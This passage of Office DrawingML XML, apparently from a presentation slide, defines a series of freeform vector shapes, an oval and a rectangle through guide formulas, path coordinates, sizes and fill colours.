                  <a:gd name="T2" fmla="*/ 27 w 28"/>
                  <a:gd name="T3" fmla="*/ 5 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 28"/>
                  <a:gd name="T5" fmla="*/ 12 h 17"/>
                  <a:gd name="T6" fmla="*/ 7 w 28"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 28"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 7 w 28"/>
                  <a:gd name="T11" fmla="*/ 5 h 17"/>
                  <a:gd name="T12" fmla="*/ 23 w 28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"/>
                  <a:gd name="T22" fmla="*/ 0 h 17"/>
                  <a:gd name="T23" fmla="*/ 28 w 2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" h="17">
                    <a:moveTo>
                      <a:pt x="23" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5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6" name="Freeform 234">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA3F9D9-D282-4D6F-8DCB-1EDF37935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2520"/>
                <a:ext cx="86" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 86"/>
                  <a:gd name="T1" fmla="*/ 17 h 21"/>
                  <a:gd name="T2" fmla="*/ 0 w 86"/>
                  <a:gd name="T3" fmla="*/ 14 h 21"/>
                  <a:gd name="T4" fmla="*/ 11 w 86"/>
                  <a:gd name="T5" fmla="*/ 15 h 21"/>
                  <a:gd name="T6" fmla="*/ 28 w 86"/>
                  <a:gd name="T7" fmla="*/ 12 h 21"/>
                  <a:gd name="T8" fmla="*/ 39 w 86"/>
                  <a:gd name="T9" fmla="*/ 11 h 21"/>
                  <a:gd name="T10" fmla="*/ 59 w 86"/>
                  <a:gd name="T11" fmla="*/ 6 h 21"/>
                  <a:gd name="T12" fmla="*/ 67 w 86"/>
                  <a:gd name="T13" fmla="*/ 5 h 21"/>
                  <a:gd name="T14" fmla="*/ 75 w 86"/>
                  <a:gd name="T15" fmla="*/ 3 h 21"/>
                  <a:gd name="T16" fmla="*/ 80 w 86"/>
                  <a:gd name="T17" fmla="*/ 0 h 21"/>
                  <a:gd name="T18" fmla="*/ 85 w 86"/>
                  <a:gd name="T19" fmla="*/ 4 h 21"/>
                  <a:gd name="T20" fmla="*/ 85 w 86"/>
                  <a:gd name="T21" fmla="*/ 12 h 21"/>
                  <a:gd name="T22" fmla="*/ 79 w 86"/>
                  <a:gd name="T23" fmla="*/ 14 h 21"/>
                  <a:gd name="T24" fmla="*/ 63 w 86"/>
                  <a:gd name="T25" fmla="*/ 15 h 21"/>
                  <a:gd name="T26" fmla="*/ 57 w 86"/>
                  <a:gd name="T27" fmla="*/ 16 h 21"/>
                  <a:gd name="T28" fmla="*/ 47 w 86"/>
                  <a:gd name="T29" fmla="*/ 18 h 21"/>
                  <a:gd name="T30" fmla="*/ 35 w 86"/>
                  <a:gd name="T31" fmla="*/ 20 h 21"/>
                  <a:gd name="T32" fmla="*/ 27 w 86"/>
                  <a:gd name="T33" fmla="*/ 20 h 21"/>
                  <a:gd name="T34" fmla="*/ 15 w 86"/>
                  <a:gd name="T35" fmla="*/ 20 h 21"/>
                  <a:gd name="T36" fmla="*/ 0 w 86"/>
                  <a:gd name="T37" fmla="*/ 17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6"/>
                  <a:gd name="T58" fmla="*/ 0 h 21"/>
                  <a:gd name="T59" fmla="*/ 86 w 86"/>
                  <a:gd name="T60" fmla="*/ 21 h 2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6" h="21">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20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7" name="Freeform 235">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6932E0F0-7A31-41C2-AD60-0C23B4E4E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506"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 28"/>
                  <a:gd name="T1" fmla="*/ 1 h 17"/>
                  <a:gd name="T2" fmla="*/ 1 w 28"/>
                  <a:gd name="T3" fmla="*/ 9 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 11 h 17"/>
                  <a:gd name="T6" fmla="*/ 6 w 28"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 14 w 28"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 23 w 28"/>
                  <a:gd name="T11" fmla="*/ 13 h 17"/>
                  <a:gd name="T12" fmla="*/ 27 w 28"/>
                  <a:gd name="T13" fmla="*/ 11 h 17"/>
                  <a:gd name="T14" fmla="*/ 25 w 28"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 24 w 28"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 0 w 28"/>
                  <a:gd name="T19" fmla="*/ 1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17"/>
                  <a:gd name="T32" fmla="*/ 28 w 28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17">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24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8" name="Freeform 236">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4579E464-4027-4F96-BCB1-75C8CD653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2431"/>
                <a:ext cx="40" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 40"/>
                  <a:gd name="T1" fmla="*/ 1 h 85"/>
                  <a:gd name="T2" fmla="*/ 38 w 40"/>
                  <a:gd name="T3" fmla="*/ 30 h 85"/>
                  <a:gd name="T4" fmla="*/ 37 w 40"/>
                  <a:gd name="T5" fmla="*/ 54 h 85"/>
                  <a:gd name="T6" fmla="*/ 39 w 40"/>
                  <a:gd name="T7" fmla="*/ 80 h 85"/>
                  <a:gd name="T8" fmla="*/ 20 w 40"/>
                  <a:gd name="T9" fmla="*/ 84 h 85"/>
                  <a:gd name="T10" fmla="*/ 1 w 40"/>
                  <a:gd name="T11" fmla="*/ 84 h 85"/>
                  <a:gd name="T12" fmla="*/ 0 w 40"/>
                  <a:gd name="T13" fmla="*/ 0 h 85"/>
                  <a:gd name="T14" fmla="*/ 35 w 40"/>
                  <a:gd name="T15" fmla="*/ 1 h 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85"/>
                  <a:gd name="T26" fmla="*/ 40 w 40"/>
                  <a:gd name="T27" fmla="*/ 85 h 8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85">
                    <a:moveTo>
                      <a:pt x="35" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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19" name="Freeform 237">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4471F15-5294-475D-9679-B24DA55A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" y="2434"/>
                <a:ext cx="30" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 30"/>
                  <a:gd name="T1" fmla="*/ 2 h 76"/>
                  <a:gd name="T2" fmla="*/ 29 w 30"/>
                  <a:gd name="T3" fmla="*/ 25 h 76"/>
                  <a:gd name="T4" fmla="*/ 29 w 30"/>
                  <a:gd name="T5" fmla="*/ 42 h 76"/>
                  <a:gd name="T6" fmla="*/ 29 w 30"/>
                  <a:gd name="T7" fmla="*/ 70 h 76"/>
                  <a:gd name="T8" fmla="*/ 15 w 30"/>
                  <a:gd name="T9" fmla="*/ 75 h 76"/>
                  <a:gd name="T10" fmla="*/ 1 w 30"/>
                  <a:gd name="T11" fmla="*/ 75 h 76"/>
                  <a:gd name="T12" fmla="*/ 0 w 30"/>
                  <a:gd name="T13" fmla="*/ 0 h 76"/>
                  <a:gd name="T14" fmla="*/ 26 w 30"/>
                  <a:gd name="T15" fmla="*/ 2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"/>
                  <a:gd name="T25" fmla="*/ 0 h 76"/>
                  <a:gd name="T26" fmla="*/ 30 w 30"/>
                  <a:gd name="T27" fmla="*/ 76 h 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" h="76">
                    <a:moveTo>
                      <a:pt x="26" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2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0" name="Freeform 238">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E69B64F-BD19-46E5-81EE-849557554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" y="2516"/>
                <a:ext cx="95" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 95"/>
                  <a:gd name="T1" fmla="*/ 1 h 42"/>
                  <a:gd name="T2" fmla="*/ 56 w 95"/>
                  <a:gd name="T3" fmla="*/ 12 h 42"/>
                  <a:gd name="T4" fmla="*/ 31 w 95"/>
                  <a:gd name="T5" fmla="*/ 22 h 42"/>
                  <a:gd name="T6" fmla="*/ 11 w 95"/>
                  <a:gd name="T7" fmla="*/ 26 h 42"/>
                  <a:gd name="T8" fmla="*/ 0 w 95"/>
                  <a:gd name="T9" fmla="*/ 30 h 42"/>
                  <a:gd name="T10" fmla="*/ 0 w 95"/>
                  <a:gd name="T11" fmla="*/ 36 h 42"/>
                  <a:gd name="T12" fmla="*/ 16 w 95"/>
                  <a:gd name="T13" fmla="*/ 39 h 42"/>
                  <a:gd name="T14" fmla="*/ 38 w 95"/>
                  <a:gd name="T15" fmla="*/ 41 h 42"/>
                  <a:gd name="T16" fmla="*/ 56 w 95"/>
                  <a:gd name="T17" fmla="*/ 38 h 42"/>
                  <a:gd name="T18" fmla="*/ 67 w 95"/>
                  <a:gd name="T19" fmla="*/ 36 h 42"/>
                  <a:gd name="T20" fmla="*/ 68 w 95"/>
                  <a:gd name="T21" fmla="*/ 38 h 42"/>
                  <a:gd name="T22" fmla="*/ 83 w 95"/>
                  <a:gd name="T23" fmla="*/ 38 h 42"/>
                  <a:gd name="T24" fmla="*/ 93 w 95"/>
                  <a:gd name="T25" fmla="*/ 37 h 42"/>
                  <a:gd name="T26" fmla="*/ 93 w 95"/>
                  <a:gd name="T27" fmla="*/ 30 h 42"/>
                  <a:gd name="T28" fmla="*/ 94 w 95"/>
                  <a:gd name="T29" fmla="*/ 27 h 42"/>
                  <a:gd name="T30" fmla="*/ 94 w 95"/>
                  <a:gd name="T31" fmla="*/ 20 h 42"/>
                  <a:gd name="T32" fmla="*/ 90 w 95"/>
                  <a:gd name="T33" fmla="*/ 15 h 42"/>
                  <a:gd name="T34" fmla="*/ 86 w 95"/>
                  <a:gd name="T35" fmla="*/ 10 h 42"/>
                  <a:gd name="T36" fmla="*/ 85 w 95"/>
                  <a:gd name="T37" fmla="*/ 0 h 42"/>
                  <a:gd name="T38" fmla="*/ 55 w 95"/>
                  <a:gd name="T39" fmla="*/ 1 h 4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5"/>
                  <a:gd name="T61" fmla="*/ 0 h 42"/>
                  <a:gd name="T62" fmla="*/ 95 w 95"/>
                  <a:gd name="T63" fmla="*/ 42 h 4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5" h="42">
                    <a:moveTo>
                      <a:pt x="55" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="26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6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85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1" name="Freeform 239">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6572FA53-4A93-4B9E-B908-F5086D3EA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1" y="2531"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 28"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 27 w 28"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 3 w 28"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 28"/>
                  <a:gd name="T7" fmla="*/ 9 h 17"/>
                  <a:gd name="T8" fmla="*/ 20 w 2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17"/>
                  <a:gd name="T17" fmla="*/ 28 w 2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17">
                    <a:moveTo>
                      <a:pt x="20" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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2" name="Freeform 240">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94984DE0-6AB3-42BD-9EF5-48E78C08B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" y="2540"/>
                <a:ext cx="30" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 30"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 29 w 30"/>
                  <a:gd name="T3" fmla="*/ 6 h 17"/>
                  <a:gd name="T4" fmla="*/ 14 w 30"/>
                  <a:gd name="T5" fmla="*/ 13 h 17"/>
                  <a:gd name="T6" fmla="*/ 7 w 30"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 30"/>
                  <a:gd name="T9" fmla="*/ 13 h 17"/>
                  <a:gd name="T10" fmla="*/ 7 w 30"/>
                  <a:gd name="T11" fmla="*/ 6 h 17"/>
                  <a:gd name="T12" fmla="*/ 25 w 30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17"/>
                  <a:gd name="T23" fmla="*/ 30 w 30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17">
                    <a:moveTo>
                      <a:pt x="25" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6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3" name="Freeform 241">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD82E8E-422E-4142-AFB4-042B57A53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" y="2531"/>
                <a:ext cx="89" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 89"/>
                  <a:gd name="T1" fmla="*/ 18 h 22"/>
                  <a:gd name="T2" fmla="*/ 0 w 89"/>
                  <a:gd name="T3" fmla="*/ 14 h 22"/>
                  <a:gd name="T4" fmla="*/ 11 w 89"/>
                  <a:gd name="T5" fmla="*/ 15 h 22"/>
                  <a:gd name="T6" fmla="*/ 29 w 89"/>
                  <a:gd name="T7" fmla="*/ 13 h 22"/>
                  <a:gd name="T8" fmla="*/ 40 w 89"/>
                  <a:gd name="T9" fmla="*/ 11 h 22"/>
                  <a:gd name="T10" fmla="*/ 61 w 89"/>
                  <a:gd name="T11" fmla="*/ 6 h 22"/>
                  <a:gd name="T12" fmla="*/ 70 w 89"/>
                  <a:gd name="T13" fmla="*/ 5 h 22"/>
                  <a:gd name="T14" fmla="*/ 78 w 89"/>
                  <a:gd name="T15" fmla="*/ 3 h 22"/>
                  <a:gd name="T16" fmla="*/ 83 w 89"/>
                  <a:gd name="T17" fmla="*/ 0 h 22"/>
                  <a:gd name="T18" fmla="*/ 88 w 89"/>
                  <a:gd name="T19" fmla="*/ 4 h 22"/>
                  <a:gd name="T20" fmla="*/ 88 w 89"/>
                  <a:gd name="T21" fmla="*/ 13 h 22"/>
                  <a:gd name="T22" fmla="*/ 82 w 89"/>
                  <a:gd name="T23" fmla="*/ 14 h 22"/>
                  <a:gd name="T24" fmla="*/ 66 w 89"/>
                  <a:gd name="T25" fmla="*/ 16 h 22"/>
                  <a:gd name="T26" fmla="*/ 60 w 89"/>
                  <a:gd name="T27" fmla="*/ 17 h 22"/>
                  <a:gd name="T28" fmla="*/ 50 w 89"/>
                  <a:gd name="T29" fmla="*/ 19 h 22"/>
                  <a:gd name="T30" fmla="*/ 37 w 89"/>
                  <a:gd name="T31" fmla="*/ 21 h 22"/>
                  <a:gd name="T32" fmla="*/ 28 w 89"/>
                  <a:gd name="T33" fmla="*/ 21 h 22"/>
                  <a:gd name="T34" fmla="*/ 15 w 89"/>
                  <a:gd name="T35" fmla="*/ 21 h 22"/>
                  <a:gd name="T36" fmla="*/ 0 w 89"/>
                  <a:gd name="T37" fmla="*/ 18 h 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9"/>
                  <a:gd name="T58" fmla="*/ 0 h 22"/>
                  <a:gd name="T59" fmla="*/ 89 w 89"/>
                  <a:gd name="T60" fmla="*/ 22 h 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9" h="22">
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="21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4" name="Freeform 242">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B3B3FEE-4518-4212-B46F-789D5B4ED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" y="2517"/>
                <a:ext cx="28" cy="18"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 28"/>
                  <a:gd name="T1" fmla="*/ 1 h 18"/>
                  <a:gd name="T2" fmla="*/ 1 w 28"/>
                  <a:gd name="T3" fmla="*/ 9 h 18"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 11 h 18"/>
                  <a:gd name="T6" fmla="*/ 6 w 28"/>
                  <a:gd name="T7" fmla="*/ 17 h 18"/>
                  <a:gd name="T8" fmla="*/ 14 w 28"/>
                  <a:gd name="T9" fmla="*/ 17 h 18"/>
                  <a:gd name="T10" fmla="*/ 23 w 28"/>
                  <a:gd name="T11" fmla="*/ 14 h 18"/>
                  <a:gd name="T12" fmla="*/ 27 w 28"/>
                  <a:gd name="T13" fmla="*/ 11 h 18"/>
                  <a:gd name="T14" fmla="*/ 24 w 28"/>
                  <a:gd name="T15" fmla="*/ 8 h 18"/>
                  <a:gd name="T16" fmla="*/ 24 w 28"/>
                  <a:gd name="T17" fmla="*/ 0 h 18"/>
                  <a:gd name="T18" fmla="*/ 0 w 28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18"/>
                  <a:gd name="T32" fmla="*/ 28 w 28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18">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11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5" name="Oval 243">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C241D8-F8FD-4C7E-946F-018440F7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2527"/>
                <a:ext cx="84" cy="14"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="60606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Rectangle 244">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53DECA66-C14E-49D4-8E94-48242F7D5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2452"/>
                <a:ext cx="8" cy="61"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="60606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endParaRPr lang="ar-SA" altLang="ko-K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Freeform 245">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1604B8-5BEA-43C2-B550-4D5F623F7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2409"/>
                <a:ext cx="148" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 148"/>
                  <a:gd name="T1" fmla="*/ 23 h 45"/>
                  <a:gd name="T2" fmla="*/ 0 w 148"/>
                  <a:gd name="T3" fmla="*/ 36 h 45"/>
                  <a:gd name="T4" fmla="*/ 49 w 148"/>
                  <a:gd name="T5" fmla="*/ 44 h 45"/>
                  <a:gd name="T6" fmla="*/ 103 w 148"/>
                  <a:gd name="T7" fmla="*/ 44 h 45"/>
                  <a:gd name="T8" fmla="*/ 144 w 148"/>
                  <a:gd name="T9" fmla="*/ 32 h 45"/>
                  <a:gd name="T10" fmla="*/ 147 w 148"/>
                  <a:gd name="T11" fmla="*/ 1 h 45"/>
                  <a:gd name="T12" fmla="*/ 63 w 148"/>
                  <a:gd name="T13" fmla="*/ 0 h 45"/>
                  <a:gd name="T14" fmla="*/ 0 w 148"/>
                  <a:gd name="T15" fmla="*/ 23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8"/>
                  <a:gd name="T25" fmla="*/ 0 h 45"/>
                  <a:gd name="T26" fmla="*/ 148 w 148"/>
                  <a:gd name="T27" fmla="*/ 45 h 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8" h="45">
                    <a:moveTo>
                      <a:pt x="0" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6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8" name="Freeform 246">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE8ADA6-52AD-4FC7-A451-289A80005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2426"/>
                <a:ext cx="137" cy="23"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 137"/>
                  <a:gd name="T1" fmla="*/ 7 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 137"/>
                  <a:gd name="T3" fmla="*/ 16 h 23"/>
                  <a:gd name="T4" fmla="*/ 42 w 137"/>
                  <a:gd name="T5" fmla="*/ 22 h 23"/>
                  <a:gd name="T6" fmla="*/ 97 w 137"/>
                  <a:gd name="T7" fmla="*/ 22 h 23"/>
                  <a:gd name="T8" fmla="*/ 136 w 137"/>
                  <a:gd name="T9" fmla="*/ 11 h 23"/>
                  <a:gd name="T10" fmla="*/ 136 w 137"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 100 w 137"/>
                  <a:gd name="T13" fmla="*/ 11 h 23"/>
                  <a:gd name="T14" fmla="*/ 43 w 137"/>
                  <a:gd name="T15" fmla="*/ 11 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 137"/>
                  <a:gd name="T17" fmla="*/ 7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"/>
                  <a:gd name="T28" fmla="*/ 0 h 23"/>
                  <a:gd name="T29" fmla="*/ 137 w 137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" h="23">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
